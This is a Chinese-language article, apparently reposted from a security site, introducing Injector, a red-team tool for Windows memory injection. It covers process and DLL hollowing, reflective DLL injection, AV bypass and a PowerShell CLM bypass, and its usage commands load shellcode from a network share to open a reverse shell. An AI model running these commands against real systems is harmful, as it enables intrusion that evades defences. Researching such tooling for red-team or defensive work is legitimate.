栏目分类:
子分类:
返回
名师互学网用户登录
快速导航关闭
当前搜索
当前分类
子分类
实用工具
热门搜索
名师互学网 > IT > 系统运维 > 网络安全 > Web安全

如何使用Injector实现Windows下的内存注入

Web安全 更新时间: 发布时间: IT归档 最新发布 模块sitemap 名妆网 法律咨询 聚返吧 英语巴士网 伯小乐 网商动力



关于Injector

Injector是一款功能齐全且强大的内存注入工具,该工具集成了多种技术,可以帮助红队研究人员实现在Windows系统下的内存注入。

Injector能做什么?

针对远程服务器和本地存储提供Shellcode注入支持。只需指定Shellcode文件,该工具将帮助我们完成后续的所有事情。默认情况下,工具会将Shellcode注入至exe,如果没有找到目标进程,它将会创建一个记事本进程,并注入其中实现持久化感染。

  • 支持反射DLL注入,工具将下载DLL并注入远程进程。
  • 通过exe实现进程镂空。
  • 使用-bypass参数,以支持使用更高级的、未记录的API来进行进程注入。
  • 支持加密的Shellcode,比如说AES加密或异或加密等。
  • 支持针对PowerShell的CLM绕过,可以直接将代码存防止能够执行C#代码的白名单文件夹中,比如说“C:WindowsTasks”。
  • 支持DLL镂空,通过dll实现。
工具下载

广大研究人员可以使用下列命令将该项目源码克隆至本地:

git clone https://github.com/0xDivyanshu/Injector.git 
工具帮助
C:Usersadmin>Injector.exe 
  •  Help Options for Xenon: 
  •  -m       Mode of operation 
  •          -m 1     Specifies the mode as Process injection 
  •          -m 2     Specifies the mode as Reflective DLL Injection 
  •          -m 3     Specifies the mode as Process Hollowing 
  •          -m 4     No injection! Give me my damn shell 
  •          -m 5     Powershell session via CLM bypass 
  •          -m 6     DLL hollowing 
  •    
  •  -TempFile        File location that your current user can read 
  •  -shellcode       Use shellcode 
  •  -dll     Use dll 
  •  -decrypt-xor     Specify Xor decryption for shellcode 
  •           -pass   Specifty the password for Xor decryption 
  •  -decrypt-aes     Specify aes decryption for shellcode 
  •           -pass   Specifty the password for aes decryption 
  •  -location        Specify the location i.e either server or local 
  •  -bypass         Uses enhance attempts to bypass AV 
  • 如需生成加密的Shellcode,请在Kali下使用Helper.exe。

    工具使用样例
    Injector.exe -m=1 -shellcode -encrypt-aes -pass=password -location="\192.x.x.xshareshellcode.txt" -bypass 

    上述命令将解密你的Shellcode并给你一个反向Shell。

    如果你不想使用加密的Shellcode,你也可以直接使用下列命令运行下列命令:

    Injector.exe -m=1 -shellcode -location="\192.x.x.xshareshellcode.txt" 

    将其中的“-m=1”修改为“2,3,4,6”之后,就可以运行其他模式了:

    Injector.exe -m=5 -TempFile=C:\Users\user\sample.txt 

    上述命令将提供要给会话,我们可以使用它来执行IEX cradle,并获取一个能够绕过CLM的反向Shell。

    PowerShell

    你还可以使用Invoke-Exe.ps1来通过PowerShel执行Injector:

    Invoke-Exe -loc C:Usersjohninjector.exe 
    项目地址

    Injector:【GitHub传送门】

     

    转载请注明:文章转载自 www.mshxw.com
    本文地址:https://www.mshxw.com/it/823957.html
    我们一直用心在做
    关于我们 文章归档 网站地图 联系我们

    版权所有 (c)2021-2022 MSHXW.COM

    ICP备案号:晋ICP备2021003244-6号